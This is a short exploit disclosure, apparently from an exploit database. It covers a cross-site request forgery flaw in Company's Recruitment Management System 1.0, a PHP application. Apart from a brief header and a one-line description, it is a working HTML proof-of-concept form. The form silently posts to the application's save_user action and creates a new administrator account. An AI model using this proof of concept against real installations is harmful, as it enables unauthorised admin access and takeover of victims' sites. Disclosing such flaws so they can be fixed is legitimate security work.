Exploit for Company's Recruitment Management System 1.0 Cross Site Request Forgery

## https://sploitus.com/exploit?id=PACKETSTORM:164527
# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)  
# Date: 18-10-2021  
# Exploit Author: Aniket Anil Deshmane  
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip  
# Version: 1  
# Tested on: Windows 10,XAMPP  
  
Detail:  
The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.  
  
CSRF POC:-  
  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"  
method="POST">  
<input type="hidden" name="id" value="" />  
<input type="hidden" name="fullname" value="Test" />  
<input type="hidden" name="username" value="Test" />  
<input type="hidden" name="type" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>